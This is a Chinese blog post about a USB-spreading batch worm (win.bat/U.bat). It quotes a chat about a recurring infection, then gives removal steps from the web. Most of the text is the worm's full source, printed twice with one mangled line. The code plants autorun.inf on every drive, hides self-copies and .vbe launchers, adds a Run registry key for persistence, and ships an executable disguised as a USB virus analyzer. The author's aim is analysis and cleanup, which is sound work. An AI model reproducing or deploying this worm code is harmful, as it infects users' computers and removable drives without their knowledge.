win病毒(也就是网络中U.bat)
昨晚十二点时候.看到了QQ群中的一个叫:病毒交流群.里面讨论的很是热烈哈.
看了看记录,摘录一些(屏蔽对方QQ号):
---------------
记录---------------
凌风(*) 00:07:14
中了个灰鸽子,老杀不掉
冰刃(*) 00:07:15
我不知道这些资料病毒有什么关系,能说说吗?
徐�S�<*> 00:07:54
凌风(*) 00:07:14
中了个灰鸽子,老杀不掉
要改注册表的
凌风(*) 00:08:28
我改了,也手动删啦
徐�S�<*> 00:08:51
?
凌风(*) 00:08:58
没有啦,但一两星期后,我又发现又出现啦
徐�S�<*> 00:09:18
那是又种了吧
凌风(*) 00:10:32
可能,我哥家的电脑,我每回来一次,就发现又中了灰鸽子
凌风(*) 00:12:45
两个星期前,我全删了,今天一用这台电脑,又有这样的东西啦
徐�S�<*> 00:13:05
光删是不行的
凌风(*) 00:13:51
文件,注册表我都删了
凌风(*) 00:17:43
win
是病毒文件来的
---------------
结束---------------
从上面的对话中就可以看出来.那位叫凌风的兄弟没有真正的清理掉win的脚本.
顺便去网络中搜索了一下…我靠!吓我一跳啊!大家都有了.我也发发咯..而且是高中生之作..网络也给出很多的方法..不知道可不可行..看其中的代码像是可以清楚…说不准~~~
其实最简单的方法就是用最新版的360安全助手啦~当时我有问了凌风仁兄.他说电脑进程出现了很多的莫名其妙的进程.估计这位高中生写的代码被人利用了.所以才导致了这样了吧.但假设改写该脚本的朋友未免也有点发神经..网络也有说这代码并不是真正的病毒.因为没有达到病毒的特征.但我从凌风这兄那所得到的代码中..没有找到”该脚本是收集病毒”该功能…..难道是…?那样太恐怖了啊~打击啊~
图片中win.bat的代码….
但是:jmp.txt sleep.vbe却没有得到…也就是得到的不全….
@echo OFF
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=1
set "endf=%systemdrive%\jmp.txt"
echo.Wscript.sleep 20000>sleep.vbe
if /i not "%cd%"=="%systemroot%" (call:cb&del/a/f/q sleep.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
"%systemroot%\U盘病毒分析Beta3.exe"
echo.Wscript.sleep 20000>sleep.vbe
:s
echo. >uishere-%v%.txt
if exist "%endf%" (goto end)
if "!dl:~%n%,1!"=="" (set n=0&sleep.vbe)
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\U盘病毒分析Beta3.exe" (goto s4)
/*如果这个脚本是病毒.那么其中的U盘分析器只是名称?实质是病毒?*/
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
if exist "%d%\%~n0.vbe" (del /a /f /q "%d%\%~n0.vbe")
:s2
call:vbe >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "U盘病毒分析Beta3.exe" "%d%\"
if exist %d%\*.sk (del /a /f /q %d%\*.sk)
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uishere-*.txt" (del /a /f /q "%systemroot%\uishere-*.txt"&sleep.vbe)
if exist "%systemroot%\uishere-*.txt" (if exist "%systemroot%\uishere-%v%.txt" (goto :eof) else (echo.>"%endf%"&sleep.vbe))
call:copy "%~dpnX0" "%systemroot%\"
rem call:copy "U盘病毒分析Beta3.exe" "%systemroot%\"
if exist "%systemroot%\%~n0.vbe" (del /a /f /q "%systemroot%\%~n0.vbe")
call:vbe >"%systemroot%\%~n0.vbe"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vbe /t REG_SZ /d "%systemroot%\%~n0.vbe" /f
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:vbe
echo.set ws=wscript.createobject("wscript.shell")
echo.ws.run "%~nx0 /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:copy
if exist "%~dp2%~nx1" (del/a/f/q "%~dp2%~nx1")
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat uda.exe U盘病毒分析.bat zap.exe 主操控.bat
cd /d "%~dp0"
goto :eof
:end
call U盘病毒分析.bat -c&call:ql&del a/f/q "%~dp0sleep.vbe" "%endf%" inf.tem "U盘病毒分析Beta3.exe" "%~n0.vbe" "%~nx0" "uishere-%v%.txt"® delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vbe /f
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=1
set "endf=%systemdrive%\jmp.txt"
echo.Wscript.sleep 20000>sleep.vbe
if /i not "%cd%"=="%systemroot%" (call:cb&del/a/f/q sleep.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
"%systemroot%\U盘病毒分析Beta3.exe"
echo.Wscript.sleep 20000>sleep.vbe
:s
echo. >uishere-%v%.txt
if exist "%endf%" (goto end)
if "!dl:~%n%,1!"=="" (set n=0&sleep.vbe)
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\U盘病毒分析Beta3.exe" (goto s4)
/*如果这个脚本是病毒.那么其中的U盘分析器只是名称?实质是病毒?*/
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
if exist "%d%\%~n0.vbe" (del /a /f /q "%d%\%~n0.vbe")
:s2
call:vbe >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "U盘病毒分析Beta3.exe" "%d%\"
if exist %d%\*.sk (del /a /f /q %d%\*.sk)
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uishere-*.txt" (del /a /f /q "%systemroot%\uishere-*.txt"&sleep.vbe)
if exist "%systemroot%\uishere-*.txt" (if exist "%systemroot%\uishere-%v%.txt" (goto :eof) else (echo.>"%endf%"&sleep.vbe))
call:copy "%~dpnX0" "%systemroot%\"
rem call:copy "U盘病毒分析Beta3.exe" "%systemroot%\"
if exist "%systemroot%\%~n0.vbe" (del /a /f /q "%systemroot%\%~n0.vbe")
call:vbe >"%systemroot%\%~n0.vbe"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vbe /t REG_SZ /d "%systemroot%\%~n0.vbe" /f
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:vbe
echo.set ws=wscript.createobject("wscript.shell")
echo.ws.run "%~nx0 /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:copy
if exist "%~dp2%~nx1" (del/a/f/q "%~dp2%~nx1")
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat uda.exe U盘病毒分析.bat zap.exe 主操控.bat
cd /d "%~dp0"
goto :eof
:end
call U盘病毒分析.bat -c&call:ql&del a/f/q "%~dp0sleep.vbe" "%endf%" inf.tem "U盘病毒分析Beta3.exe" "%~n0.vbe" "%~nx0" "uishere-%v%.txt"® delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vbe /f
给我感觉写这个脚本的要么有病.要么是恶作剧.
在网络搜索中却看这样子:
------
双击D.E.F盘符。出现windows 脚本宿主对话框
框里内容是:脚本:D:\u.vbe
行:1
字符:1
错误:系统找不到指定的文件
代码:80070002
源:(null)
框里内容是:脚本:D:\u.vbe
行:1
字符:1
错误:系统找不到指定的文件
代码:80070002
源:(null)
------
看来这个U毒并不是所有的电脑都会成功的哈~
------
通过网络:只找出了VBS中的一个小代码:
wscript.createobject("wscript.shell").run """u.bat"" /start",0
搜索网络:
找到答案.却不能解决~
win.vbe
、win.bat、autorun.inf 、*.sk病毒的清理方法2007-07-26 15:21特征:
1
、打不开硬盘(只能从地址栏里直接进),提示c:\win.vbe脚本错误.
2
、进程项里有多个wscripe.exe进程
3
、在各盘符根目录有:win.vbe win.bat autorun.inf *.SK(如2007-07-12.sk,*代表当前时间)
4
、msconfig启动项目里有一个:win 命令位置:c:\windows\win.exe
解决办法:
1
、开始运行regedit打开注册表找到:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
将其子键全部删除,不要刷新,也不要重起,直接打开硬盘就可以了,然后删除其下的"WIN.VBE WIN.BAT AUTORUN.INF *.SK等文件("*"代表当前日期)病毒文件。
上述病毒文件需要打开隐藏文件才可以看到。
2
、用360等交替清理,重启. OK!
-------------------
[url]http://www.51cto.com/art/200711/61074.htm[/url] 51CTO
中也发了相关的…
-------------------
本文出自 “鸡蛋仔” 博客,谢绝转载!